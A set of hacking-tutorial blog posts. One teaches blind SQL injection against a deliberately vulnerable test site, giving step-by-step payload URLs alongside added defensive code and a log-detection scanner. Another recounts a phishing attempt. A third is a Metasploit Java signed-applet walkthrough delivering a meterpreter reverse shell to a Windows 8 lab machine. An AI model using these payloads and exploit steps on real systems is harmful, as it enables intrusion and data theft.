
Thursday, 19 February 2015

Blind SQL Injection

Only proceed if you know SQL Injection basics. If not, read these posts first:

What we know so far

If you've read the above three tutorials, you know the basic theory of what SQL Injection is, you know how to carry it out using your web browser on a vulnerable website, and you know how to use SQLMap to automate some of the process.

Now, for revision's sake, what we did in the Manual SQL injection tutorial was:
  1. Found a potentially vulnerable website (http://testphp.vulnweb.com)
  2. Used a single quote ( ' ) to verify vulnerability.
  3. Found out the number of rows and columns by making some small changes to the URL (which in turn changes the query that is executed on the server)
  4. Obtained the names of tables, their columns, and finally extracted data.

However, it is worth noting that the website was intentionally left vulnerable, and most often the flaws in security aren't this obvious. In our case, the website was willingly responding to our queries with errors. This may not always be the case. As long as we can see the errors, we know we're going in the right direction. Errors tend to give us clues. However, some websites may choose to suppress the error messages. This makes SQLi harder, and the technique needed then is known as Blind SQL Injection.



What I didn't tell you

I explained in some detail what each and every step did. However, I did not explain the motive behind each step. (I gave a rough idea in the SQL injection basics post.)
The purpose of the single quote ( ' ) was to find out how the server handles bad inputs. If it has some mechanism for sanitizing or escaping such dangerous characters, then we would not see any error in the output.

Now this is not intended to be a theoretical post. While the SQL Injection basics post was for total beginners, I am linking a SQL Injection post appropriate for anyone who has carried out the classical SQL Injection attack, which we did in the manual SQL injection attack post, and is ready for blind SQL Injection.

Intermediate level SQL injection (Wikipedia had great theory on SQLi, so I cropped the important bits from a hacker's point of view and posted them here)

SQL Injection example with explanation (This post isn't very useful for actual hacking, but explains concepts very well with examples. PS: This is an external link. Since their content is not licensed under creative commons, I couldn't simply crop the important part and put it here, so you have to go to their website)

PS: The posts in the beginning of the tutorial are mandatory, these are optional reads. You may choose to skip these and come back later and read whenever you're free. Now we'll get started.

Finding a suitable website 

We now have to find a website which is vulnerable to SQL Injection, but does not show error messages. Basically, a site which can be hacked into but not using classical attacks. The site will not give any obvious responses to our attacks. This is why it is called a blind SQL Injection. It is hard to know whether we're doing it right or not.

Now there's a problem. Blind SQLi is quite time consuming. One first tries the classical attacks, and proceeds to blind SQLi only if they fail. I can't find a website which wouldn't mind being attacked and exposed in public, so I'll have to use the same old testphp.vulnweb.com website. The URL we're going to attack is vulnerable to classical SQLi. However, we're going to assume that it's not, and attack it without using any of the methods we used in the previous SQLi tutorial. That being said, blind SQLi involves a lot of guessing, and the fact that I can use union based SQL injection (the classical injection we did already) to find out table names, etc. makes it much easier for me to write the tutorial. Now we'll begin.

Finding out if target is vulnerable

Our target in this attack is:
http://testphp.vulnweb.com/listproducts.php?cat=2
Now the first task is to find out whether the target is vulnerable or not. Ideally, one would add a single quote to find out whether the target is vulnerable to classical injection, and proceed to blind SQLi only if it is not. In our case, the target is indeed vulnerable to classical injection (since we see an error when we append a single quote ' to the URL). But for the sake of learning, we will ignore this fact and proceed with Blind SQLi. From now on we will assume that there will be no errors whatsoever to aid our attack.

Now we have a problem

If the site won't return any errors, how can we find out if it's vulnerable? The solution is a pretty elegant one. This attack is based on boolean algebra. It's pretty intuitive and surprisingly simple.

The basic concept is as simple as the following:
1=1 is true
1=2 is false
When we specify 1=1: (true and true) = true
When we specify 1=2: (true and false) = false

Now look at the statements:
http://testphp.vulnweb.com/listproducts.php?cat=2 and 1=1
http://testphp.vulnweb.com/listproducts.php?cat=2 and 1=2
Now the basic condition for determining whether the website is vulnerable to injection is to find out whether it executes the code we send it, or just ignores it. Earlier we used a single quote, and the error suggested that our code was indeed processed. This time errors are not shown, so we use logic. In the first URL the condition evaluates as true, and the page is displayed as usual. Basically we're asking the database to show the page if 'category is 2' and '1 is the same as 1'. Both conditions are fulfilled and the page is shown. In the second case 'category is 2' but '1 is not the same as 2', so the condition simplifies to false, and nothing is shown. What can we conclude? We conclude that the code we add to the URL is processed by the DBMS software (usually MySQL).
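To see the same oracle from the defender's side, here is an added example (my own code, not from the original post) that models the listproducts.php?cat= endpoint in Python with an in-memory SQLite database: a handler that concatenates cat into the query and hides errors, the way a blind target does, beside one that binds cat as a parameter. It also runs the (SELECT 1 FROM table)=1 existence probe used later in this post, to show that suppressing errors does not remove the oracle but binding the value does. The schema and rows are constructed sample data.

```python
import sqlite3

# Constructed sample schema standing in for the target's database.
def make_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE products (id INTEGER, cat INTEGER, name TEXT);
        INSERT INTO products VALUES (1, 1, 'poster'), (2, 2, 'photo'), (3, 2, 'print');
        CREATE TABLE users (uname TEXT, pass TEXT);
        INSERT INTO users VALUES ('test', 'test');
    """)
    return con

def list_products_vulnerable(con, cat):
    """Builds the SQL by string concatenation, as listproducts.php?cat= does.
    Errors are swallowed, so the page is 'blind': a database error and an
    empty result both look like a blank page.  The page still answers
    true/false questions about the database, which is all blind SQLi needs."""
    sql = "SELECT name FROM products WHERE cat=" + cat
    try:
        return [row[0] for row in con.execute(sql)]
    except sqlite3.Error:
        return []          # suppressed error: blank page, no message

def list_products_fixed(con, cat):
    """Same lookup with the input bound as a parameter.  Whatever the string
    contains is compared with the cat column as a value; it is never parsed
    as SQL, so 'and 1=1' cannot change the query's logic."""
    sql = "SELECT name FROM products WHERE cat=?"
    return [row[0] for row in con.execute(sql, (cat,))]

def page_shown(handler, cat):
    """The only signal a blind attacker gets: did the page render any rows?"""
    return bool(handler(make_db(), cat))

def acts_as_boolean_oracle(handler):
    """The post's vulnerability test as a regression check: the tautology
    (1=1) renders and the contradiction (1=2) does not.  A fixed endpoint
    answers both probes identically, so there is nothing to infer from."""
    return page_shown(handler, "2 and 1=1") and not page_shown(handler, "2 and 1=2")

def table_exists_probe(handler, table):
    """The (SELECT 1 FROM X)=1 existence check.  On the vulnerable handler a
    missing table raises an error that is hidden, so the page is blank and
    the probe reads as false; an existing table renders the page as usual."""
    return page_shown(handler, f"2 and (SELECT 1 FROM {table})=1")

if __name__ == "__main__":
    for name, handler in (("vulnerable", list_products_vulnerable),
                          ("fixed", list_products_fixed)):
        print(name, "oracle:", acts_as_boolean_oracle(handler),
              "users table leaks:", table_exists_probe(handler, "users"),
              "admin table leaks:", table_exists_probe(handler, "admin"))
```

The fixed handler returns nothing for every probe string, so the two responses an attacker compares are identical; that, not the hidden error message, is what closes the channel.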


Finding other details

Now the process of finding out other details would be identical. We now know that if we type a true statement after and, then the page is displayed, else it's not. We can simply keep guessing stuff till we are right, in which case the condition is true, and page is displayed.

Finding version

Now it is very impractical to expect that we'll easily be able to guess the complete version; the pic will show you why (it's from the manual SQLi tutorial).
However, we don't need to know the exact version. Finding out whether it's MySQL version 4 or 5 is sufficient. For that, we can extract a substring from the version, which in this case is simply its first character. This can be done using substring(@@version,1,1). @@version returns the whole version string (5.1.6.9........), and the arguments 1,1 extract the first character. We can then compare it with 4 or 5 to find out which version the website is using.
PS: I put this screenshot here to explain why we used substring; we did not use the fact that we already know the version in any way. Even if you have no clue about the version (which is what is going to happen in a real life scenario), you can find it out by looking at the output of the following URLs. You can read more about the substring function here.
http://testphp.vulnweb.com/listproducts.php?cat=2 and substring(@@version,1,1)=4
http://testphp.vulnweb.com/listproducts.php?cat=2 and substring(@@version,1,1)=5 

As you might have guessed, the version is 5 since it did not return a blank page. I hope you've started to see the pattern now.

Finding tables, columns and records

We will now have to guess the table names. The idea is to start with some common ones, and you'll most probably get a few tables. Most databases have a table for users, admin, login, employees, etc. Now I'll demonstrate a few failures and successes and then we'll proceed. There is another alternative in which we go character by character, and a third method in which we use ASCII codes.

Problem : Since the website does not display output, how do we find out the table names?
Solution : We can do what we've been doing so far: ask the website if table name = X, where X is our guess at the table name. We keep repeating until the condition returns true, i.e., there exists a table with the name that we guessed.

Problem : This is just a concept, how do we put it to action? How do we ask the database to return true if we guess the right table name? Can't be as simple as 1=1....
Solution : We will use a select query; select 1 from X is going to be our query. If there is a table called X, the output will be 1. Now we can use this output to build a condition: (select 1 from X) = 1. If table X exists, the output is 1 and, since 1=1, the condition is true. If X does not exist, the condition is false. (In MySQL the subquery must return exactly one row: an empty table gives NULL and a table with several rows gives an error, and either way the page is blank just as for a missing table, so a false answer does not prove the table is absent.)

Problem : What if we can't guess the table name?
Solution : We have 2 more alternatives. The first is to use substring, as we did while finding the version, to find out the table name character by character. Basically, we will ask the database if the first character of the table name is a. If not, we'll try b, c, d, etc. After that we'll proceed to the second character. This way, we are guaranteed to find out the table name. (I hope you are getting a good idea why it's called blind SQLi.)

Alternate Solution : We can use ASCII values to speed up the above solution. Basically, we can't directly compare characters like numbers: 6 is greater than 5, but b is not greater than a. Characters can't be compared like that. However, their ASCII forms can, since each letter corresponds to a number in ASCII. We can use this fact to ask the database if the first letter of the table name is more than P or less than it. This way, if the database says it's more, we don't have to check the letters before P, and vice versa. [This is just the concept; I'll demonstrate how it's to be done.]

Now, for finding table name, I'll stick to simple guessing. The remaining 2 concepts will be demonstrated while finding column name and data value respectively.

Limit Clause : It must be noted that a select query returns all the results from a given table, not just the first. For example, if a table has 500 records, and you ask the table for records where the first letter is 'a', it will return not one, but all the records with first letter 'a'. This is not what we want. To avoid this, we use the LIMIT clause.
Here is a short summary; read the complete section on the LIMIT clause here.
Let's see what the offset and count mean in the LIMIT clause:
  • The offset specifies the offset of the first row to return. The offset of the first row is 0, not 1.
  • The count specifies the maximum number of rows to return.
I've covered all the concepts, now I hope you can read the commands and figure out what they mean.

Table name

Now we'll try to guess table name
http://testphp.vulnweb.com/listproducts.php?cat=1 and (SELECT 1 from admin)=1
The error message will not be displayed in real blind SQLi. We will see a blank output, like we did earlier.

http://testphp.vulnweb.com/listproducts.php?cat=1 and (SELECT 1 from users)=1 
The page loads fine. This means there is indeed a table named users.
Now, if you are trying this attack on some other site, then you might not be able to guess the name if it isn't as obvious as users. So I recommend you keep reading and try again once you know how to guess one letter at a time (for column name) and how to use ASCII (for obtaining data).
PS: Here limit is not required since we guessed the whole table name at once and not character by character.

Column Name

1. Guessing the whole name

Now, there are 2 ways to get column name. The first way is to guess the complete column name, as we did for table name. 
http://testphp.vulnweb.com/listproducts.php?cat=2 and (SELECT substring(concat(1,username),1,1) from users limit 0,1)=1
http://testphp.vulnweb.com/listproducts.php?cat=2 and (SELECT substring(concat(1,uname),1,1) from users limit 0,1)=1 
The page displays normally for uname, so we know that a column called uname exists. For practice, you can also replace uname with pass,cc,address,email,name,phone,cart1. All these columns also exist in the table.

2. Guessing character by character using equality (=)


The second way is to go character by character. There are 2 ways to do this too. One is to guess the character directly, second is to find the range in which the character lies, and then guess it. I'll show both. This method requires information_schema, i.e. it will work for MySQL 5 series but not 4.
Here I have directly used 117. You may (and in reality will have to) try all possible ascii codes (65 to 122 for A to z)
http://testphp.vulnweb.com/listproducts.php?cat=2 and ascii(substring((select concat(column_name) from information_schema.columns where table_name=0x7573657273+limit 0,1),1,1))= 117
PS: I tried to see if MySQL automatically converts characters to their ASCII values for the comparison, and found out that it does indeed. So one may trim the query a bit, and it ends up as shown below. So basically, contrary to what I said earlier, b is indeed bigger than a. Here is the same code with 'u' instead of 117:

http://testphp.vulnweb.com/listproducts.php?cat=2%20and%20substring((select%20concat(column_name)%20from%20information_schema.columns%20where%20table_name=0x7573657273+limit%200,1),1,1)='u' 
117 is the ASCII code for u. We know the column name is uname, so the page should display fine, which it does. You can try values other than 117 and see what happens. Also, 7573657273 is the hex encoding of users (0x indicates hex). Remember, you can do the same for tables by making a few changes: first replace column in the above code with table. A few more changes are necessary too. Here's what the final code looks like:


3. Guessing character using > or < followed by =

It's almost the same as we did before
http://testphp.vulnweb.com/listproducts.php?cat=2 and ascii(substring((select concat(column_name) from information_schema.columns where table_name=0x7573657273+limit 0,1),1,1))> 100
We now know it's > 100 (100 is 'd'), since the page displayed properly.
http://testphp.vulnweb.com/listproducts.php?cat=2 and ascii(substring((select concat(column_name) from information_schema.columns where table_name=0x7573657273+limit 0,1),1,1))> 120
But it is less than 120 ('x'), since page doesn't display well.
 http://testphp.vulnweb.com/listproducts.php?cat=2 and ascii(substring((select concat(column_name) from information_schema.columns where table_name=0x7573657273+limit 0,1),1,1))> 110
Greater than 110 ('n')
 http://testphp.vulnweb.com/listproducts.php?cat=2 and ascii(substring((select concat(column_name) from information_schema.columns where table_name=0x7573657273+limit 0,1),1,1))> 115
Greater than 115 ('s'). Now only 5 possibilities remain: 116, 117, 118, 119 and 120 (it is greater than 115 but not greater than 120). We can now try all 5 one by one. The ascii() wrapper is the part of the query you can drop: remove it and compare the character itself in single quotes ('a', 'b', etc.) instead of the numbers.
Finally you'll get success at-
http://testphp.vulnweb.com/listproducts.php?cat=2 and ascii(substring((select concat(column_name) from information_schema.columns where table_name=0x7573657273+limit 0,1),1,1))= 117

However, we only know the first letter of the column name. To find the second letter, change the position argument of the outer substring (the 1 just before the final ,1) from 1 to 2. The code becomes:
http://testphp.vulnweb.com/listproducts.php?cat=2 and ascii(substring((select concat(column_name) from information_schema.columns where table_name=0x7573657273+limit 0,1),2,1))= 117
It will not display properly since the second character in uname is n. (ascii 110)
http://testphp.vulnweb.com/listproducts.php?cat=2 and ascii(substring((select concat(column_name) from information_schema.columns where table_name=0x7573657273+limit 0,1),2,1))= 110
You can use the > < = method here too. Everything other than 2 will be the same.

Extracting data

Now while what you did so far wasn't very swift either, what you're going to do now is going to be terribly slow. You have to guess the data as well. Each and everything needs to be guessed. 

http://testphp.vulnweb.com/listproducts.php?cat=2 and ascii(substring((SELECT concat(uname) from users limit 0,1),1,1))>64
http://testphp.vulnweb.com/listproducts.php?cat=2 and ascii(substring((SELECT concat(uname) from users limit 0,1),1,1))>100
http://testphp.vulnweb.com/listproducts.php?cat=2 and ascii(substring((SELECT concat(uname) from users limit 0,1),1,1))>120
Page doesn't display properly for 120 (x)
http://testphp.vulnweb.com/listproducts.php?cat=2 and ascii(substring((SELECT concat(uname) from users limit 0,1),1,1))>115
http://testphp.vulnweb.com/listproducts.php?cat=2 and ascii(substring((SELECT concat(uname) from users limit 0,1),1,1))=116
So the first letter is 't'. For the second character (without ascii this time):
http://testphp.vulnweb.com/listproducts.php?cat=2 and substring((SELECT concat(uname) from users limit 0,1),2,1)>'a' 
http://testphp.vulnweb.com/listproducts.php?cat=2 and substring((SELECT concat(uname) from users limit 0,1),2,1)>'f'  
It lies between 'b' and 'f'
http://testphp.vulnweb.com/listproducts.php?cat=2 and substring((SELECT concat(uname) from users limit 0,1),2,1) = 'b'
 Keep trying
http://testphp.vulnweb.com/listproducts.php?cat=2 and substring((SELECT concat(uname) from users limit 0,1),2,1) = 'e'
Second character is 'e'. You may proceed like this until you find the complete uname. You can check that a character was the last in the word by asking about the position after it (put that position in place of n below):
http://testphp.vulnweb.com/listproducts.php?cat=2 and ascii(substring((SELECT concat(uname) from users limit 0,1),n,1))>0
If there is any other character left, >0 will return true; for a position past the end the substring is empty, ascii('') is 0, and the page goes blank.

This was all there is to blind SQL Injection. In the next post I'll introduce you to some tools which do the task for you. To be honest, no one will call you a noob if you use scripts/tools to automate blind SQLi. It is a really time consuming process, and there is no need to waste so much time when you can write a script to do all the guesswork for you.
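Because the whole technique is hundreds of near-identical requests from one client, it is also easy to spot in web server logs. As an added example (my code, not the post's), here is a small Python scanner that reads Apache-style access log lines, URL-decodes each request target, matches the fingerprints the probes in this post leave behind (N=N tautologies, substring/ascii wrappers, @@version, information_schema, 0x hex literals, LIMIT offset,count) and groups the hits per client IP. The log lines are constructed to mirror the URLs above, and the indicator list and the reporting threshold are my own choices.

```python
import re
from urllib.parse import unquote_plus

# Apache/nginx combined-format prefix: client ip, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})')

# Fingerprints of the probes shown in this post, matched on the decoded,
# lower-cased request target.  Each alone is weak evidence; several from one
# client within minutes are not.
INDICATORS = {
    "boolean_probe":      re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+"),
    "substring_fn":       re.compile(r"\bsubstr(ing)?\s*\("),
    "ascii_fn":           re.compile(r"\bascii\s*\("),
    "version_var":        re.compile(r"@@version"),
    "information_schema": re.compile(r"\binformation_schema\."),
    "hex_literal":        re.compile(r"\b0x[0-9a-f]{4,}"),
    "limit_clause":       re.compile(r"\blimit\s+\d+\s*,\s*\d+"),
}
# Flagged requests from one client before it is reported (assumed tuning value).
SUSPECT_THRESHOLD = 3

def parse_line(line):
    """Return ip, decoded target and status for one log line, or None if it
    does not match the expected format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {"ip": m["ip"], "target": unquote_plus(m["target"]), "status": int(m["status"])}

def classify(target):
    """Names of the indicators present in one decoded request target."""
    text = target.lower()
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))

def analyse(lines):
    """Aggregate per client: request count, flagged count, indicator union, verdict."""
    report = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        entry = report.setdefault(rec["ip"], {"requests": 0, "flagged": 0, "indicators": set()})
        entry["requests"] += 1
        hits = classify(rec["target"])
        if hits:
            entry["flagged"] += 1
            entry["indicators"].update(hits)
    for entry in report.values():
        entry["indicators"] = sorted(entry["indicators"])
        entry["suspected"] = entry["flagged"] >= SUSPECT_THRESHOLD
    return report

# Constructed sample log: one client replaying this post's probes, one ordinary visitor.
SAMPLE_LOG = [
    '203.0.113.7 - - [19/Feb/2015:10:01:02 +0000] "GET /listproducts.php?cat=2 HTTP/1.1" 200 5123',
    '203.0.113.7 - - [19/Feb/2015:10:01:09 +0000] "GET /listproducts.php?cat=2%20and%201=1 HTTP/1.1" 200 5123',
    '203.0.113.7 - - [19/Feb/2015:10:01:15 +0000] "GET /listproducts.php?cat=2%20and%201=2 HTTP/1.1" 200 412',
    '203.0.113.7 - - [19/Feb/2015:10:02:30 +0000] "GET /listproducts.php?cat=2%20and%20substring(@@version,1,1)=5 HTTP/1.1" 200 5123',
    '203.0.113.7 - - [19/Feb/2015:10:03:01 +0000] "GET /listproducts.php?cat=2%20and%20ascii(substring((select%20concat(column_name)%20from%20information_schema.columns%20where%20table_name=0x7573657273+limit%200,1),1,1))%3E100 HTTP/1.1" 200 5123',
    '198.51.100.9 - - [19/Feb/2015:10:03:40 +0000] "GET /listproducts.php?cat=1 HTTP/1.1" 200 4870',
    '198.51.100.9 - - [19/Feb/2015:10:04:12 +0000] "GET /search.php?q=black+and+white HTTP/1.1" 200 2210',
]

if __name__ == "__main__":
    for ip, entry in analyse(SAMPLE_LOG).items():
        print(ip, entry)
```

Note that the blind probes all return HTTP 200, so status codes alone never show them; the response size (412 versus 5123 above) and the request pattern are what differ.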





Friday, 20 June 2014

Real Life Phishing Scenario : Zero Day google bug


A reader on my blog tried to hack my account

Now all this time I've been teaching people how to hack wireless networks, Windows machines, websites and social networking accounts. All this we did in Kali Linux. For once, I'm moving away from the operating system and narrating a real life incident of how someone almost got my email account and password, and could possibly have infected me with a RAT (remote administration tool). He didn't really mean to hack my account, but was rather interested in making a point. So this is how it happened.



How it started

Every day, I check my Blogger dashboard to see if there are any new comments on my blog. This morning I saw an anonymous comment (most of the comments are anonymous, so that didn't alarm me) saying that the person needed my help with something but would only contact me via mail. I couldn't give him my personal mail address, so I decided to use my website's mail instead and sent him a message. This was his reply:



Looked fair enough. Out of curiosity I clicked the link and it took me to a Google Drive login page. Everything looked pretty convincing, and I could easily have entered my credentials into the login form, if it were not for the slightly suspicious URL. Also, it was HTTPS and Chrome verified the digital certificate to be Google's. Faking this can be assumed to be next to impossible. However, I was still cautious, considering that I run a hacking blog and it's not unlikely that a person visiting here might be good, maybe a million times better than me.

What I did

So, I decided I could not just dismiss the page as phishing without trying. I entered the email abcd@gmail.com and the password lookslikephishing and pressed sign in. Now if it were a real page, it would have said incorrect password, but this page had no mechanism for verifying the form data; it just logged everything (i.e. it recorded whatever someone entered in the form) and would download the PDF no matter what was entered. So, after entering the bogus login data, the PDF download started. It completed successfully and I opened the PDF. The content looked genuine, and then I realized: what if this was a two-fold attack, first phishing, then infection? He could have used a FUD remote administration tool which my antivirus wouldn't be able to detect. I have Windows Defender on my Windows 8 machine, but with proper crypting, antiviruses can be evaded. So after this, I went to the white hat section of HackForums and asked for help (everyone needs help at some time or the other, and I suck at forensics and related stuff). An expert analyzed my computer thoroughly via TeamViewer, and the file was indeed clean. Meanwhile, the following mails had been sent to me.

Mails Received


He sent me some mails
He knew I found out the phishing page thing
He said he wants me to spread public awareness regarding this kind of phishing

I replied to him saying that I'm finding out and cleaning the malware he sent me (if any). He replied and said he didn't send any malware or anything.

Finally

I contacted him via FB. He turned out to be a fellow Indian and was even younger than me (I'm 17, he is 16). By this time I had finished my investigation, and the white hat expert from HackForums didn't find anything either. I finally concluded that either there is no malware, or he's just too good. The latter is quite unlikely, since he was not able to dig up my personal email address on his own. Believe me, that's really easy to do. After having a conversation with him and doing some research on this HTTPS phishing page, I realized that it is done using a bug in Google Drive, which has been discussed on The Hacker News. I will see if I can replicate an HTTPS phishing website using this bug, and post a tutorial on how to do it. The sole intent of this post is to make people aware that phishing is a real threat, and to encourage Google to fix this bug soon. Either way, they will surely patch this bug after I write the tutorial on creating a phishing page using Google Drive, as Google won't want its users' accounts to be compromised by any random kid with a laptop who ended up on this website. They have already applied a patch which makes carrying this out difficult: during the earlier days of this vulnerability the URL was short and not suspicious at all, but now it's very long (see the screenshots).
Update : Google is probably not going to do anything about the issue, as it is not a bug, and I'm not going to take the risk of writing anything which will bring upon me the wrath of Google (as I use Blogger for hosting and Blogger is owned by Google). Google Drive, just like Dropbox, allows hosting simple HTML sites like this phishing one. This can be abused, since some people will not know that this is a malicious document uploaded by someone and not a legit Google Drive login page, but it still is not a bug.
Hacker's message on FB
After I told the hacker on Facebook about this post, even he acknowledged that everything about this attack is perfect except the URL, which earlier used to start with Google Drive but now has a long suspicious prefix. The vulnerability has been half patched and Google will possibly patch the remaining part soon.

Thursday, 29 May 2014

Java signed applet Hack Windows 8 Java vulnerability


Purpose of this tutorial

In this tutorial we will look at how difficult it can be to hack modern operating systems. While you won't be getting the kind of results you were expecting, you will learn a lot here. The exploit will not work at first go, it will not work in the second go, it will eventually work, but we would have modified too many settings in the target OS to call it success. We will be using a pretty mainstream exploit here, the java signed applet exploit.
(Just in case you're new here. You need to have Kali Linux installed, as well as have some basic info about metasploit. Here is the collection of all tutorials. Read first few or maybe all. I write new posts assuming you've read the previous ones)

Hack any Windows Version

In the previous tutorials we have hacked Windows XP and tested a few Payloads and its features. In this tutorial, we will use a Java exploit to hack any Windows version. Now there are some things that you need to know-
  1. There are no 'type something on console and press enter' exploits for modern Operating Systems. They invest enough in security to patch any such vulnerabilities. 
  2. The modern operating systems have exploits where the user has to do something like click on a link, install some program, and in our case, allow java plugin to be used.
  3. The operating systems are quite secure; however, the applications installed by the users almost always have some bugs which can be exploited, and then by privilege escalation methods you can get an administrator shell. Java is widely used, and is, unfortunately, quite secure (but we will still use a Java exploit here)
  4. If you have the latest OS and latest version of Java installed, then they already know how to deal with these kind of attacks and it won't work. We will use Windows 8 and Java 7 build 60 (I upgraded it today), and our exploit will not work. We will then see how to make it work. We will learn a lot of new things. Please follow along only if you have curiosity for knowledge, not just desire to hack.

Java Signed Applet Exploit (browser based exploit)

Some official words here, to help with your digestion-

This exploit dynamically creates a .jar file via the Msf::Exploit::Java mixin, then signs it. The resulting signed applet is presented to the victim via a web page with an applet tag. The victim's JVM will pop a dialog asking if they trust the signed applet. On older versions the dialog will display the value of CERTCN in the "Publisher" line. Newer JVMs display "UNKNOWN" when the signature is not trusted (i.e., it's not signed by a trusted CA). The SigningCert option allows you to provide a trusted code signing cert, the values in which will override CERTCN. If SigningCert is not given, a randomly generated self-signed cert will be used. Either way, once the user clicks "run", the applet executes with full user permissions.

Follow these steps

Commands to execute are the ones typed at the root@kali:~# and msf prompts; my instructions are in parentheses (in the original they were colour coded, and the msfconsole ASCII banner is omitted here).

root@kali:~# service postgresql start
[ ok ] Starting PostgreSQL 9.1 database server: main.
root@kali:~# service metasploit start
[ ok ] Starting Metasploit rpc server: prosvc.
[ ok ] Starting Metasploit web server: thin.
root@kali:~# msfconsole

Using notepad to track pentests? Have Metasploit Pro report on hosts,
services, sessions and evidence -- type 'go_pro' to launch it now.
       =[ metasploit v4.6.0-dev [core:4.6 api:1.0]
+ -- --=[ 1060 exploits - 659 auxiliary - 178 post
+ -- --=[ 275 payloads - 28 encoders - 8 nops

msf > use exploit/multi/browser/java_signed_applet    (Java signed applet exploit)
msf  exploit(java_signed_applet) > show options

Module options (exploit/multi/browser/java_signed_applet):
   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   APPLETNAME      SiteLoader       yes       The main applet's class name.
   CERTCN          SiteLoader       yes       The CN= value for the certificate. Cannot contain ',' or '/'
   SRVHOST         0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT         8080             yes       The local port to listen on.
   SSL             false            no        Negotiate SSL for incoming connections
   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion      SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   SigningCert                      no        Path to a signing certificate in PEM or PKCS12 (.pfx) format
   SigningKey                       no        Path to a signing key in PEM format
   SigningKeyPass                   no        Password for signing key (required if SigningCert is a .pfx)
   URIPATH                          no        The URI to use for this exploit (default is random)

Exploit target:
   Id  Name
   --  ----
   1   Windows x86 (Native Payload)

msf  exploit(java_signed_applet) > set PAYLOAD windows/meterpreter/reverse_tcp    (meterpreter payload)
PAYLOAD => windows/meterpreter/reverse_tcp
msf  exploit(java_signed_applet) > show options

Module options (exploit/multi/browser/java_signed_applet):
   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   APPLETNAME      SiteLoader       yes       The main applet's class name.
   CERTCN          SiteLoader       yes       The CN= value for the certificate. Cannot contain ',' or '/'
   SRVHOST         0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT         8080             yes       The local port to listen on.
   SSL             false            no        Negotiate SSL for incoming connections
   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion      SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   SigningCert                      no        Path to a signing certificate in PEM or PKCS12 (.pfx) format
   SigningKey                       no        Path to a signing key in PEM format
   SigningKeyPass                   no        Password for signing key (required if SigningCert is a .pfx)
   URIPATH                          no        The URI to use for this exploit (default is random)

Payload options (windows/meterpreter/reverse_tcp):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST                      yes       The listen address    (your Kali IP is needed here)
   LPORT     4444             yes       The listen port

Exploit target:
   Id  Name
   --  ----
   1   Windows x86 (Native Payload)

msf  exploit(java_signed_applet) > set LHOST 192.168.154.134    (type ifconfig to find your Kali IP)
LHOST => 192.168.154.134
msf  exploit(java_signed_applet) > exploit
[*] Exploit running as background job.
msf  exploit(java_signed_applet) >
[*] Started reverse handler on 192.168.154.134:4444
[*] Using URL: http://0.0.0.0:8080/ybfxLEoT
[*]  Local IP: http://192.168.154.134:8080/ybfxLEoT    (copy this and paste it into the browser of the computer you want to hack)
[*] Server started.
[*] 192.168.154.1    java_signed_applet - Handling request
[*] 192.168.154.1    java_signed_applet - Handling request
[*] 192.168.154.1    java_signed_applet - Handling request
msf  exploit(java_signed_applet) >

On our Windows 8 machine

If you haven't installed Java then this is what you'll see.
If you have installed Java then this is what you'll see.


Now after you click run this time, you might end up seeing a dialog which blocked access to the Java plugin even after we allowed it.
If you are using an older version of Java, you might have gained access already, unless your antivirus detected the payload, which is basically a trojan (if you succeed here, a session will be created in Metasploit, but it will be in the background; see the end of the tutorial to find out how to use that session, and then come back here to see the scenario in the case of Windows 8, as there are things to learn). But in my case, it's now time to realize that we've taken a head-on collision with a really secure operating system and the latest version of Java. Now, as I said, this will not work, but you can still give it your best shot.

Why won't it work

Java Sandbox

In technical terms: The java-sandbox allows you to securely execute untrusted code (for example, user generated scripts in scripting languages such as groovy or rhino) from within your application. It allows you to specify resources and classes that may be used by the code, thus separating the execution from the application's execution environment. It allows you to wrap execution environments in threads or even execute them remotely on different jvms. (sourceforge)

In less technical terms: In April, Oracle instituted a number of changes starting with Java 7u21. The new update introduced prompts warning users that an unsigned applet could potentially harm the user's computer. This came months after Oracle changed Java's default security settings from medium to high, essentially preventing unsigned applets from executing automatically, requiring instead a user to allow the applet to proceed. Developers must now sign their applets with a certificate from a trusted Certificate Authority. (threatpost)

In English: New versions of Java have an added feature known as the Java sandbox. Whenever a Java applet is loaded in a browser, it will first require the user's permission to execute. After the user has given permission, the applet will load inside a sandbox (a runtime environment separated from the rest of the computer, like a cage; the Java applet is harmless as long as it stays inside). That doesn't solve their problem though, as the sandbox stops the Java applet from doing much, thereby defeating the whole purpose, even for genuine developers. So, Java restricts unsigned applets from exercising much of their functionality, and only signed applets can do anything. So, hats off to Oracle, for proving that even client-side vulnerabilities are not that easy. And sorry to disappoint you guys, but I had to tell you how secure modern operating systems are. Nevertheless, going to the Java control panel and the security tab will lead you to the conclusion that the Java security level is high by default. Even more mind-boggling is the fact that the security levels are: medium, high, very high. Guess the days of 'low' security are gone. However, medium is just what we are looking for.
The sandbox is enabled at the high level.
The sandbox is disabled at the medium level. That will solve our purpose here.
Now we opened our Java applet again and this time a really dangerous-looking security warning dialog came up. Nevertheless, we clicked on "I accept" and then Run.
As if this wasn't enough, Windows had to interfere. I could almost hear Windows Defender saying, Java is good, but Microsoft still trusts its own antivirus for security. Our exploit failed yet again. This time it was the antivirus.
You might have guessed: disable the antivirus.

